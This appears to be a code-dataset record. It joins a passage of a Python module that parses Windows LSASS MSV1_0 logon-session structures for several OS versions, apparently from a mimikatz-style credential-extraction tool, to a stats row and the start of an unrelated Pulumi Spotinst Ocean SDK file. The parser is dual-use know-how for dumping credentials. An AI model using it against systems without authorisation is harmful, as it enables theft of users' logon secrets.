res.PrimaryCredentials_ptr = await PKIWI_MSV1_0_PRIMARY_CREDENTIAL_ENC.load(reader)
return res
class PKIWI_MSV1_0_CREDENTIAL_LIST(POINTER):
def __init__(self):
super().__init__()
@staticmethod
async def load(reader):
p = PKIWI_MSV1_0_CREDENTIAL_LIST()
p.location = reader.tell()
p.value = await reader.read_uint()
p.finaltype = KIWI_MSV1_0_CREDENTIAL_LIST
return p
class PKIWI_MSV1_0_LIST_51(POINTER):
def __init__(self):
super().__init__()
@staticmethod
async def load(reader):
p = PKIWI_MSV1_0_LIST_51()
p.location = reader.tell()
p.value = await reader.read_uint()
p.finaltype = KIWI_MSV1_0_LIST_51
return p
class KIWI_MSV1_0_LIST_51:
def __init__(self):
self.Flink = None
self.Blink = None
self.LocallyUniqueIdentifier = None
self.UserName = None
self.Domaine = None
self.unk0 = None
self.unk1 = None
self.pSid = None
self.LogonType = None
self.Session = None
self.LogonTime = None
self.LogonServer = None
self.Credentials_list_ptr = None
self.unk19 = None
self.unk20 = None
self.unk21 = None
self.unk22 = None
self.unk23 = None
self.CredentialManager = None
@staticmethod
async def load(reader):
res = KIWI_MSV1_0_LIST_51()
res.Flink = await PKIWI_MSV1_0_LIST_51.load(reader)
res.Blink = await PKIWI_MSV1_0_LIST_51.load(reader)
res.LocallyUniqueIdentifier = await LUID.loadvalue(reader)
res.UserName = await LSA_UNICODE_STRING.load(reader)
res.Domaine = await LSA_UNICODE_STRING.load(reader)
res.unk0 = await PVOID.loadvalue(reader)
res.unk1 = await PVOID.loadvalue(reader)
res.pSid = await PSID.load(reader)
res.LogonType = await ULONG.loadvalue(reader)
res.Session = await ULONG.loadvalue(reader)
await reader.align(8)
t = t = await reader.read(8)
res.LogonTime = int.from_bytes(t, byteorder = 'little', signed = False) #autoalign x86
await reader.align()
res.LogonServer = await LSA_UNICODE_STRING.load(reader)
res.Credentials_list_ptr = await PKIWI_MSV1_0_CREDENTIAL_LIST.load(reader)
res.unk19 = await ULONG.loadvalue(reader)
await reader.align()
res.unk20 = await PVOID.loadvalue(reader)
res.unk21 = await PVOID.loadvalue(reader)
res.unk22 = await PVOID.loadvalue(reader)
res.unk23 = await ULONG.loadvalue(reader)
await reader.align()
res.CredentialManager = await PVOID.load(reader)
return res
class PKIWI_MSV1_0_LIST_52(POINTER):
def __init__(self):
super().__init__()
@staticmethod
async def load(reader):
p = PKIWI_MSV1_0_LIST_52()
p.location = reader.tell()
p.value = await reader.read_uint()
p.finaltype = KIWI_MSV1_0_LIST_52
return p
class KIWI_MSV1_0_LIST_52:
def __init__(self):
self.Flink = None
self.Blink = None
self.LocallyUniqueIdentifier = None
self.UserName = None
self.Domaine = None
self.unk0 = None
self.unk1 = None
self.pSid = None
self.LogonType = None
self.Session = None
self.LogonTime = None
self.LogonServer = None
self.Credentials_list_ptr = None
self.unk19 = None
self.unk20 = None
self.unk21 = None
self.unk22 = None
self.CredentialManager = None
@staticmethod
async def load(reader):
res = KIWI_MSV1_0_LIST_52()
res.Flink = await PKIWI_MSV1_0_LIST_52.load(reader)
res.Blink = await PKIWI_MSV1_0_LIST_52.load(reader)
res.LocallyUniqueIdentifier = await LUID.loadvalue(reader)
res.UserName = await LSA_UNICODE_STRING.load(reader)
res.Domaine = await LSA_UNICODE_STRING.load(reader)
res.unk0 = await PVOID.loadvalue(reader)
res.unk1 = await PVOID.loadvalue(reader)
res.pSid = await PSID.load(reader)
res.LogonType = await ULONG.loadvalue(reader)
res.Session = await ULONG.loadvalue(reader)
await reader.align(8)
t = await reader.read(8)
res.LogonTime = int.from_bytes(t, byteorder = 'little', signed = False) #autoalign x86
res.LogonServer = await LSA_UNICODE_STRING.load(reader)
res.Credentials_list_ptr = await PKIWI_MSV1_0_CREDENTIAL_LIST.load(reader)
res.unk19 = await ULONG.loadvalue(reader)
await reader.align()
res.unk20 = await PVOID.loadvalue(reader)
res.unk21 = await PVOID.loadvalue(reader)
res.unk22 = await ULONG.loadvalue(reader)
await reader.align()
res.CredentialManager = await PVOID.load(reader)
return res
class PKIWI_MSV1_0_LIST_60(POINTER):
def __init__(self):
super().__init__()
@staticmethod
async def load(reader):
p = PKIWI_MSV1_0_LIST_60()
p.location = reader.tell()
p.value = await reader.read_uint()
p.finaltype = KIWI_MSV1_0_LIST_60
return p
class KIWI_MSV1_0_LIST_60:
def __init__(self):
self.Flink = None
self.Blink = None
self.unk0 = None
self.unk1 = None
self.unk2 = None
self.unk3 = None
self.unk4 = None
self.unk5 = None
self.hSemaphore6 = None
self.unk7 = None
self.hSemaphore8 = None
self.unk9 = None
self.unk10 = None
self.unk11 = None
self.unk12 = None
self.unk13 = None
self.LocallyUniqueIdentifier = None
self.SecondaryLocallyUniqueIdentifier = None
self.UserName = None
self.Domaine = None
self.unk14 = None
self.unk15 = None
self.pSid = None
self.LogonType = None
self.Session = None
self.LogonTime = None
self.LogonServer = None
self.Credentials_list_ptr = None
self.unk19 = None
self.unk20 = None
self.unk21 = None
self.unk22 = None
self.unk23 = None
self.CredentialManager = None
@staticmethod
async def load(reader):
res = KIWI_MSV1_0_LIST_60()
res.Flink = await PKIWI_MSV1_0_LIST_60.load(reader)
res.Blink = await PKIWI_MSV1_0_LIST_60.load(reader)
await reader.align()
res.unk0 = await PVOID.loadvalue(reader)
res.unk1 = await ULONG.loadvalue(reader)
await reader.align()
res.unk2 = await PVOID.loadvalue(reader)
res.unk3 = await ULONG.loadvalue(reader)
res.unk4 = await ULONG.loadvalue(reader)
res.unk5 = await ULONG.loadvalue(reader)
await reader.align()
res.hSemaphore6 = await HANDLE.loadvalue(reader)
await reader.align()
res.unk7 = await PVOID.loadvalue(reader)
await reader.align()
res.hSemaphore8 = await HANDLE.loadvalue(reader)
await reader.align()
res.unk9 = await PVOID.loadvalue(reader)
await reader.align()
res.unk10 = await PVOID.loadvalue(reader)
res.unk11 = await ULONG.loadvalue(reader)
res.unk12 = await ULONG.loadvalue(reader)
await reader.align()
res.unk13 = await PVOID.loadvalue(reader)
await reader.align()
t = await reader.read(8)
res.LocallyUniqueIdentifier = int.from_bytes(t, byteorder = 'little', signed = False)
t = await reader.read(8)
res.SecondaryLocallyUniqueIdentifier = int.from_bytes(t, byteorder = 'little', signed = False)
await reader.align()
res.UserName = await LSA_UNICODE_STRING.load(reader)
res.Domaine = await LSA_UNICODE_STRING.load(reader)
res.unk14 = await PVOID.loadvalue(reader)
res.unk15 = await PVOID.loadvalue(reader)
res.pSid = await PSID.load(reader)
res.LogonType = await ULONG.loadvalue(reader)
res.Session = await ULONG.loadvalue(reader)
await reader.align(8)
t = await reader.read(8)
res.LogonTime = int.from_bytes(t, byteorder = 'little', signed = False) #autoalign x86
res.LogonServer = await LSA_UNICODE_STRING.load(reader)
res.Credentials_list_ptr = await PKIWI_MSV1_0_CREDENTIAL_LIST.load(reader)
res.unk19 = await ULONG.loadvalue(reader)
await reader.align()
res.unk20 = await PVOID.loadvalue(reader)
res.unk21 = await PVOID.loadvalue(reader)
res.unk22 = await PVOID.loadvalue(reader)
res.unk23 = await ULONG.loadvalue(reader)
await reader.align()
res.CredentialManager = await PVOID.load(reader)
return res
class PKIWI_MSV1_0_LIST_61(POINTER):
def __init__(self):
super().__init__()
@staticmethod
async def load(reader):
p = PKIWI_MSV1_0_LIST_61()
p.location = reader.tell()
p.value = await reader.read_uint()
p.finaltype = KIWI_MSV1_0_LIST_61
return p
class KIWI_MSV1_0_LIST_61:
def __init__(self):
self.Flink = None
self.Blink = None
self.unk0 = None
self.unk1 = None
self.unk2 = None
self.unk3 = None
self.unk4 = None
self.unk5 = None
self.hSemaphore6 = None
self.unk7 = None
self.hSemaphore8 = None
self.unk9 = None
self.unk10 = None
self.unk11 = None
self.unk12 = None
self.unk13 = None
self.LocallyUniqueIdentifier = None
self.SecondaryLocallyUniqueIdentifier = None
self.UserName = None
self.Domaine = None
self.unk14 = None
self.unk15 = None
self.pSid = None
self.LogonType = None
self.Session = None
self.LogonTime = None
self.LogonServer = None
self.Credentials_list_ptr = None
self.unk19 = None
self.unk20 = None
self.unk21 = None
self.unk22 = None
self.CredentialManager = None
@staticmethod
async def load(reader):
res = KIWI_MSV1_0_LIST_61()
res.Flink = await PKIWI_MSV1_0_LIST_61.load(reader)
res.Blink = await PKIWI_MSV1_0_LIST_61.load(reader)
res.unk0 = await PVOID.loadvalue(reader)
res.unk1 = await ULONG.loadvalue(reader)
await reader.align()
res.unk2 = await PVOID.loadvalue(reader)
res.unk3 = await ULONG.loadvalue(reader)
res.unk4 = await ULONG.loadvalue(reader)
res.unk5 = await ULONG.loadvalue(reader)
await reader.align()
res.hSemaphore6 = await HANDLE.loadvalue(reader)
res.unk7 = await PVOID.loadvalue(reader)
res.hSemaphore8 = await HANDLE.loadvalue(reader)
res.unk9 = await PVOID.loadvalue(reader)
res.unk10 = await PVOID.loadvalue(reader)
res.unk11 = await ULONG.loadvalue(reader)
res.unk12 = await ULONG.loadvalue(reader)
res.unk13 = await PVOID.loadvalue(reader)
res.LocallyUniqueIdentifier = await LUID.loadvalue(reader)
res.SecondaryLocallyUniqueIdentifier = await LUID.loadvalue(reader)
res.UserName = await LSA_UNICODE_STRING.load(reader)
res.Domaine = await LSA_UNICODE_STRING.load(reader)
res.unk14 = await PVOID.loadvalue(reader)
res.unk15 = await PVOID.loadvalue(reader)
res.pSid = await PSID.load(reader)
res.LogonType = await ULONG.loadvalue(reader)
res.Session = await ULONG.loadvalue(reader)
await reader.align(8)
t = await reader.read(8)
res.LogonTime = int.from_bytes(t, byteorder = 'little', signed = False) #autoalign x86
res.LogonServer = await LSA_UNICODE_STRING.load(reader)
res.Credentials_list_ptr = await PKIWI_MSV1_0_CREDENTIAL_LIST.load(reader)
res.unk19 = await PVOID.loadvalue(reader)
res.unk20 = await PVOID.loadvalue(reader)
res.unk21 = await PVOID.loadvalue(reader)
res.unk22 = await ULONG.loadvalue(reader)
await reader.align()
res.CredentialManager = await PVOID.load(reader)
return res
class PKIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ(POINTER):
def __init__(self):
super().__init__()
@staticmethod
async def load(reader):
p = PKIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ()
p.location = reader.tell()
p.value = await reader.read_uint()
p.finaltype = KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ
return p
class KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ:
def __init__(self):
self.Flink = None
self.Blink = None
self.unk0 = None
self.unk1 = None
self.unk2 = None
self.unk3 = None
self.unk4 = None
self.unk5 = None
self.hSemaphore6 = None
self.unk7 = None
self.hSemaphore8 = None
self.unk9 = None
self.unk10 = None
self.unk11 = None
self.unk12 = None
self.unk13 = None
self.LocallyUniqueIdentifier = None
self.SecondaryLocallyUniqueIdentifier = None
self.waza = None
self.UserName = None
self.Domaine = None
self.unk14 = None
self.unk15 = None
self.pSid = None
self.LogonType = None
self.Session = None
self.LogonTime = None
self.LogonServer = None
self.Credentials_list_ptr = None
self.unk19 = None
self.unk20 = None
self.unk21 = None
self.unk22 = None
self.CredentialManager = None
@staticmethod
async def load(reader):
res = KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ()
res.Flink = await PKIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ.load(reader)
res.Blink = await PKIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ.load(reader)
res.unk0 = await PVOID.loadvalue(reader)
res.unk1 = await ULONG.loadvalue(reader)
await reader.align()
res.unk2 = await PVOID.loadvalue(reader)
res.unk3 = await ULONG.loadvalue(reader)
res.unk4 = await ULONG.loadvalue(reader)
res.unk5 = await ULONG.loadvalue(reader)
await reader.align()
res.hSemaphore6 = await HANDLE.loadvalue(reader)
res.unk7 = await PVOID.loadvalue(reader)
res.hSemaphore8 = await HANDLE.loadvalue(reader)
res.unk9 = await PVOID.loadvalue(reader)
res.unk10 = await PVOID.loadvalue(reader)
res.unk11 = await ULONG.loadvalue(reader)
res.unk12 = await ULONG.loadvalue(reader)
res.unk13 = await PVOID.loadvalue(reader)
res.LocallyUniqueIdentifier = await LUID.loadvalue(reader)
res.SecondaryLocallyUniqueIdentifier = await LUID.loadvalue(reader)
res.waza = await reader.read(12)
await reader.align()
res.UserName = await LSA_UNICODE_STRING.load(reader)
res.Domaine = await LSA_UNICODE_STRING.load(reader)
res.unk14 = await PVOID.loadvalue(reader)
res.unk15 = await PVOID.loadvalue(reader)
res.pSid = await PSID.load(reader)
res.LogonType = await ULONG.loadvalue(reader)
res.Session = await ULONG.loadvalue(reader)
await reader.align(8)
t = await reader.read(8)
res.LogonTime = int.from_bytes(t, byteorder = 'little', signed = False) #autoalign x86
res.LogonServer = await LSA_UNICODE_STRING.load(reader)
res.Credentials_list_ptr = await PKIWI_MSV1_0_CREDENTIAL_LIST.load(reader)
res.unk19 = await PVOID.loadvalue(reader)
res.unk20 = await PVOID.loadvalue(reader)
res.unk21 = await PVOID.loadvalue(reader)
res.unk22 = await ULONG.loadvalue(reader)
await reader.align()
res.CredentialManager = await PVOID.load(reader)
return res
class PKIWI_MSV1_0_LIST_62(POINTER):
def __init__(self):
super().__init__()
@staticmethod
async def load(reader):
p = PKIWI_MSV1_0_LIST_62()
p.location = reader.tell()
p.value = await reader.read_uint()
p.finaltype = KIWI_MSV1_0_LIST_62
return p
class KIWI_MSV1_0_LIST_62:
def __init__(self):
self.Flink = None
self.Blink = None
self.unk0 = None
self.unk1 = None
self.unk2 = None
self.unk3 = None
self.unk4 = None
self.unk5 = None
self.hSemaphore6 = None
self.unk7 = None
self.hSemaphore8 = None
self.unk9 = None
self.unk10 = None
self.unk11 = None
self.unk12 = None
self.unk13 = None
self.LocallyUniqueIdentifier = None
self.SecondaryLocallyUniqueIdentifier = None
self.UserName = None
self.Domaine = None
self.unk14 = None
self.unk15 = None
self.Type = None
self.pSid = None
self.LogonType = None
self.unk18 = None
self.Session = None
self.LogonTime = None
self.LogonServer = None
self.Credentials_list_ptr = None
self.unk19 = None
self.unk20 = None
self.unk21 = None
self.unk22 = None
self.unk23 = None
self.unk24 = None
self.unk25 = None
self.unk26 = None
self.unk27 = None
self.unk28 = None
self.unk29 = None
self.CredentialManager = None
@staticmethod
async def load(reader):
res = KIWI_MSV1_0_LIST_62()
res.Flink = await PKIWI_MSV1_0_LIST_62.load(reader)
res.Blink = await PKIWI_MSV1_0_LIST_62.load(reader)
res.unk0 = await PVOID.loadvalue(reader)
res.unk1 = await ULONG.loadvalue(reader)
await reader.align()
res.unk2 = await PVOID.loadvalue(reader)
res.unk3 = await ULONG.loadvalue(reader)
res.unk4 = await ULONG.loadvalue(reader)
res.unk5 = await ULONG.loadvalue(reader)
await reader.align()
res.hSemaphore6 = await HANDLE.loadvalue(reader)
res.unk7 = await PVOID.loadvalue(reader)
res.hSemaphore8 = await HANDLE.loadvalue(reader)
res.unk9 = await PVOID.loadvalue(reader)
res.unk10 = await PVOID.loadvalue(reader)
res.unk11 = await ULONG.loadvalue(reader)
res.unk12 = await ULONG.loadvalue(reader)
res.unk13 = await PVOID.loadvalue(reader)
res.LocallyUniqueIdentifier = await LUID.loadvalue(reader)
res.SecondaryLocallyUniqueIdentifier = await LUID.loadvalue(reader)
res.UserName = await LSA_UNICODE_STRING.load(reader)
res.Domaine = await LSA_UNICODE_STRING.load(reader)
res.unk14 = await PVOID.loadvalue(reader)
res.unk15 = await PVOID.loadvalue(reader)
res.Type = await LSA_UNICODE_STRING.load(reader)
res.pSid = await PSID.load(reader)
res.LogonType = await ULONG.loadvalue(reader)
await reader.align()
res.unk18 = await PVOID.loadvalue(reader)
res.Session = await ULONG.loadvalue(reader)
await reader.align()
t = await reader.read(8)
res.LogonTime = int.from_bytes(t, byteorder = 'little', signed = False) #autoalign x86
res.LogonServer = await LSA_UNICODE_STRING.load(reader)
res.Credentials_list_ptr = await PKIWI_MSV1_0_CREDENTIAL_LIST.load(reader)
res.unk19 = await PVOID.loadvalue(reader)
res.unk20 = await PVOID.loadvalue(reader)
res.unk21 = await PVOID.loadvalue(reader)
res.unk22 = await ULONG.loadvalue(reader)
res.unk23 = await ULONG.loadvalue(reader)
res.unk24 = await ULONG.loadvalue(reader)
res.unk25 = await ULONG.loadvalue(reader)
res.unk26 = await ULONG.loadvalue(reader)
await reader.align()
res.unk27 = await PVOID.loadvalue(reader)
res.unk28 = await PVOID.loadvalue(reader)
res.unk29 = await PVOID.loadvalue(reader)
res.CredentialManager = await PVOID.load(reader)
return res
class PKIWI_MSV1_0_LIST_63(POINTER):
def __init__(self):
super().__init__()
@staticmethod
async def load(reader):
p = PKIWI_MSV1_0_LIST_63()
p.location = reader.tell()
p.value = await reader.read_uint()
p.finaltype = KIWI_MSV1_0_LIST_63
return p
class KIWI_MSV1_0_LIST_63:
def __init__(self):
self.Flink = None
self.Blink = None
self.unk0 = None
self.unk1 = None
self.unk2 = None
self.unk3 = None
self.unk4 = None
self.unk5 = None
self.hSemaphore6 = None
self.unk7 = None
self.hSemaphore8 = None
self.unk9 = None
self.unk10 = None
self.unk11 = None
self.unk12 = None
self.unk13 = None
self.LocallyUniqueIdentifier = None
self.SecondaryLocallyUniqueIdentifier = None
self.waza = None
self.UserName = None
self.Domaine = None
self.unk14 = None
self.unk15 = None
self.Type = None
self.pSid = None
self.LogonType = None
self.unk18 = None
self.Session = None
self.LogonTime = None
self.LogonServer = None
self.Credentials_list_ptr = None
self.unk19 = None
self.unk20 = None
self.unk21 = None
self.unk22 = None
self.unk23 = None
self.unk24 = None
self.unk25 = None
self.unk26 = None
self.unk27 = None
self.unk28 = None
self.unk29 = None
self.CredentialManager = None
@staticmethod
async def load(reader):
res = KIWI_MSV1_0_LIST_63()
res.Flink = await PKIWI_MSV1_0_LIST_63.load(reader)
res.Blink = await PKIWI_MSV1_0_LIST_63.load(reader)
res.unk0 = await PVOID.loadvalue(reader)
res.unk1 = await ULONG.loadvalue(reader)
await reader.align()
res.unk2 = await PVOID.loadvalue(reader)
res.unk3 = await ULONG.loadvalue(reader)
res.unk4 = await ULONG.loadvalue(reader)
res.unk5 = await ULONG.loadvalue(reader)
await reader.align()
res.hSemaphore6 = await HANDLE.loadvalue(reader)
res.unk7 = await PVOID.loadvalue(reader)
res.hSemaphore8 = await HANDLE.loadvalue(reader)
res.unk9 = await PVOID.loadvalue(reader)
res.unk10 = await PVOID.loadvalue(reader)
res.unk11 = await ULONG.loadvalue(reader)
res.unk12 = await ULONG.loadvalue(reader)
res.unk13 = await PVOID.loadvalue(reader)
await reader.align()
res.LocallyUniqueIdentifier = await LUID.loadvalue(reader)
res.SecondaryLocallyUniqueIdentifier = await LUID.loadvalue(reader)
res.waza = await reader.read(12)
await reader.align()
res.UserName = await LSA_UNICODE_STRING.load(reader)
res.Domaine = await LSA_UNICODE_STRING.load(reader)
res.unk14 = await PVOID.loadvalue(reader)
res.unk15 = await PVOID.loadvalue(reader)
res.Type = await LSA_UNICODE_STRING.load(reader)
res.pSid = await PSID.load(reader)
res.LogonType = await ULONG.loadvalue(reader)
await reader.align()
res.unk18 = await PVOID.loadvalue(reader)
res.Session = await ULONG.loadvalue(reader)
await reader.align(8)
t = await reader.read(8)
res.LogonTime = int.from_bytes(t, byteorder = 'little', signed = False) #autoalign x86
res.LogonServer = await LSA_UNICODE_STRING.load(reader)
res.Credentials_list_ptr = await PKIWI_MSV1_0_CREDENTIAL_LIST.load(reader)
res.unk19 = await PVOID.loadvalue(reader)
res.unk20 = await PVOID.loadvalue(reader)
res.unk21 = await PVOID.loadvalue(reader)
res.unk22 = await ULONG.loadvalue(reader)
res.unk23 = await ULONG.loadvalue(reader)
res.unk24 = await ULONG.loadvalue(reader)
res.unk25 = await ULONG.loadvalue(reader)
res.unk26 = await ULONG.loadvalue(reader)
await reader.align()
#input('CredentialManager\n' + hexdump(reader.peek(0x100)))
res.unk27 = await PVOID.loadvalue(reader)
res.unk28 = await PVOID.loadvalue(reader)
res.unk29 = await PVOID.loadvalue(reader)
res.CredentialManager = await PVOID.load(reader)
return res | 33.445725 | 120 | 0.748887 | 4,790 | 34,817 | 5.269102 | 0.064092 | 0.089702 | 0.104838 | 0.072309 | 0.907286 | 0.883593 | 0.853679 | 0.816633 | 0.78561 | 0.756805 | 0 | 0.045288 | 0.152081 | 34,817 | 1,041 | 121 | 33.445725 | 0.809633 | 0.021139 | 0 | 0.805348 | 0 | 0.013904 | 0.029844 | 0.025115 | 0 | 0 | 0.000705 | 0 | 0 | 1 | 0.026738 | false | 0.068449 | 0.004278 | 0 | 0.083422 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
1bd1cb0d628d618b8c01369a12188e64043924f6 | 81,160 | py | Python | sdk/python/pulumi_spotinst/aws/ocean.py | pulumi/pulumi-spotinst | 75592d6293d63f6cec703722f2e02ff1fb1cca44 | [
"ECL-2.0",
"Apache-2.0"
] | 4 | 2019-12-21T20:50:43.000Z | 2021-12-01T20:57:38.000Z | sdk/python/pulumi_spotinst/aws/ocean.py | pulumi/pulumi-spotinst | 75592d6293d63f6cec703722f2e02ff1fb1cca44 | [
"ECL-2.0",
"Apache-2.0"
] | 103 | 2019-12-09T22:03:16.000Z | 2022-03-30T17:07:34.000Z | sdk/python/pulumi_spotinst/aws/ocean.py | pulumi/pulumi-spotinst | 75592d6293d63f6cec703722f2e02ff1fb1cca44 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['OceanArgs', 'Ocean']
@pulumi.input_type
class OceanArgs:
def __init__(__self__, *,
security_groups: pulumi.Input[Sequence[pulumi.Input[str]]],
subnet_ids: pulumi.Input[Sequence[pulumi.Input[str]]],
associate_public_ip_address: Optional[pulumi.Input[bool]] = None,
autoscaler: Optional[pulumi.Input['OceanAutoscalerArgs']] = None,
blacklists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
controller_id: Optional[pulumi.Input[str]] = None,
desired_capacity: Optional[pulumi.Input[int]] = None,
draining_timeout: Optional[pulumi.Input[int]] = None,
ebs_optimized: Optional[pulumi.Input[bool]] = None,
fallback_to_ondemand: Optional[pulumi.Input[bool]] = None,
grace_period: Optional[pulumi.Input[int]] = None,
iam_instance_profile: Optional[pulumi.Input[str]] = None,
image_id: Optional[pulumi.Input[str]] = None,
instance_metadata_options: Optional[pulumi.Input['OceanInstanceMetadataOptionsArgs']] = None,
key_name: Optional[pulumi.Input[str]] = None,
load_balancers: Optional[pulumi.Input[Sequence[pulumi.Input['OceanLoadBalancerArgs']]]] = None,
logging: Optional[pulumi.Input['OceanLoggingArgs']] = None,
max_size: Optional[pulumi.Input[int]] = None,
min_size: Optional[pulumi.Input[int]] = None,
monitoring: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
root_volume_size: Optional[pulumi.Input[int]] = None,
scheduled_tasks: Optional[pulumi.Input[Sequence[pulumi.Input['OceanScheduledTaskArgs']]]] = None,
spot_percentage: Optional[pulumi.Input[int]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input['OceanTagArgs']]]] = None,
update_policy: Optional[pulumi.Input['OceanUpdatePolicyArgs']] = None,
use_as_template_only: Optional[pulumi.Input[bool]] = None,
user_data: Optional[pulumi.Input[str]] = None,
utilize_commitments: Optional[pulumi.Input[bool]] = None,
utilize_reserved_instances: Optional[pulumi.Input[bool]] = None,
whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a Ocean resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] security_groups: One or more security group ids.
:param pulumi.Input[Sequence[pulumi.Input[str]]] subnet_ids: A comma-separated list of subnet identifiers for the Ocean cluster. Subnet IDs should be configured with auto assign public IP.
:param pulumi.Input[bool] associate_public_ip_address: Configure public IP address allocation.
:param pulumi.Input['OceanAutoscalerArgs'] autoscaler: Describes the Ocean Kubernetes Auto Scaler.
:param pulumi.Input[Sequence[pulumi.Input[str]]] blacklists: Instance types not allowed in the Ocean cluster. Cannot be configured if `whitelist` is configured.
:param pulumi.Input[str] controller_id: A unique identifier used for connecting the Ocean SaaS platform and the Kubernetes cluster. Typically, the cluster name is used as its identifier.
:param pulumi.Input[int] desired_capacity: The number of instances to launch and maintain in the cluster.
:param pulumi.Input[int] draining_timeout: The time in seconds, the instance is allowed to run while detached from the ELB. This is to allow the instance time to be drained from incoming TCP connections before terminating it, during a scale down operation.
:param pulumi.Input[bool] ebs_optimized: Enable EBS optimized for cluster. Flag will enable optimized capacity for high bandwidth connectivity to the EB service for non EBS optimized instance types. For instances that are EBS optimized this flag will be ignored.
:param pulumi.Input[bool] fallback_to_ondemand: If not Spot instance markets are available, enable Ocean to launch On-Demand instances instead.
:param pulumi.Input[int] grace_period: The amount of time, in seconds, after the instance has launched to start checking its health.
:param pulumi.Input[str] iam_instance_profile: The instance profile iam role.
:param pulumi.Input[str] image_id: ID of the image used to launch the instances.
:param pulumi.Input['OceanInstanceMetadataOptionsArgs'] instance_metadata_options: Ocean instance metadata options object for IMDSv2.
:param pulumi.Input[str] key_name: The key pair to attach the instances.
:param pulumi.Input[Sequence[pulumi.Input['OceanLoadBalancerArgs']]] load_balancers: - Array of load balancer objects to add to ocean cluster
:param pulumi.Input['OceanLoggingArgs'] logging: Logging configuration.
:param pulumi.Input[int] max_size: The upper limit of instances the cluster can scale up to.
:param pulumi.Input[int] min_size: The lower limit of instances the cluster can scale down to.
:param pulumi.Input[bool] monitoring: Enable detailed monitoring for cluster. Flag will enable Cloud Watch detailed monitoring (one minute increments). Note: there are additional hourly costs for this service based on the region used.
:param pulumi.Input[str] name: Required if type is set to `CLASSIC`
:param pulumi.Input[str] region: The region the cluster will run in.
:param pulumi.Input[int] root_volume_size: The size (in Gb) to allocate for the root volume. Minimum `20`.
:param pulumi.Input[Sequence[pulumi.Input['OceanScheduledTaskArgs']]] scheduled_tasks: Set scheduling object.
:param pulumi.Input[int] spot_percentage: The percentage of Spot instances that would spin up from the `desired_capacity` number.
:param pulumi.Input[Sequence[pulumi.Input['OceanTagArgs']]] tags: Optionally adds tags to instances launched in an Ocean cluster.
:param pulumi.Input[bool] use_as_template_only: launch specification defined on the Ocean object will function only as a template for virtual node groups.
When set to true, on Ocean resource creation please make sure your custom VNG has an initial_nodes parameter to create nodes for your VNG.
:param pulumi.Input[str] user_data: Base64-encoded MIME user data to make available to the instances.
:param pulumi.Input[bool] utilize_reserved_instances: If Reserved instances exist, Ocean will utilize them before launching Spot instances.
:param pulumi.Input[Sequence[pulumi.Input[str]]] whitelists: Instance types allowed in the Ocean cluster. Cannot be configured if `blacklist` is configured.
"""
pulumi.set(__self__, "security_groups", security_groups)
pulumi.set(__self__, "subnet_ids", subnet_ids)
if associate_public_ip_address is not None:
pulumi.set(__self__, "associate_public_ip_address", associate_public_ip_address)
if autoscaler is not None:
pulumi.set(__self__, "autoscaler", autoscaler)
if blacklists is not None:
pulumi.set(__self__, "blacklists", blacklists)
if controller_id is not None:
pulumi.set(__self__, "controller_id", controller_id)
if desired_capacity is not None:
pulumi.set(__self__, "desired_capacity", desired_capacity)
if draining_timeout is not None:
pulumi.set(__self__, "draining_timeout", draining_timeout)
if ebs_optimized is not None:
pulumi.set(__self__, "ebs_optimized", ebs_optimized)
if fallback_to_ondemand is not None:
pulumi.set(__self__, "fallback_to_ondemand", fallback_to_ondemand)
if grace_period is not None:
pulumi.set(__self__, "grace_period", grace_period)
if iam_instance_profile is not None:
pulumi.set(__self__, "iam_instance_profile", iam_instance_profile)
if image_id is not None:
pulumi.set(__self__, "image_id", image_id)
if instance_metadata_options is not None:
pulumi.set(__self__, "instance_metadata_options", instance_metadata_options)
if key_name is not None:
pulumi.set(__self__, "key_name", key_name)
if load_balancers is not None:
pulumi.set(__self__, "load_balancers", load_balancers)
if logging is not None:
pulumi.set(__self__, "logging", logging)
if max_size is not None:
pulumi.set(__self__, "max_size", max_size)
if min_size is not None:
pulumi.set(__self__, "min_size", min_size)
if monitoring is not None:
pulumi.set(__self__, "monitoring", monitoring)
if name is not None:
pulumi.set(__self__, "name", name)
if region is not None:
pulumi.set(__self__, "region", region)
if root_volume_size is not None:
pulumi.set(__self__, "root_volume_size", root_volume_size)
if scheduled_tasks is not None:
pulumi.set(__self__, "scheduled_tasks", scheduled_tasks)
if spot_percentage is not None:
pulumi.set(__self__, "spot_percentage", spot_percentage)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if update_policy is not None:
pulumi.set(__self__, "update_policy", update_policy)
if use_as_template_only is not None:
pulumi.set(__self__, "use_as_template_only", use_as_template_only)
if user_data is not None:
pulumi.set(__self__, "user_data", user_data)
if utilize_commitments is not None:
pulumi.set(__self__, "utilize_commitments", utilize_commitments)
if utilize_reserved_instances is not None:
pulumi.set(__self__, "utilize_reserved_instances", utilize_reserved_instances)
if whitelists is not None:
pulumi.set(__self__, "whitelists", whitelists)
@property
@pulumi.getter(name="securityGroups")
def security_groups(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
One or more security group ids.
"""
return pulumi.get(self, "security_groups")
@security_groups.setter
def security_groups(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "security_groups", value)
@property
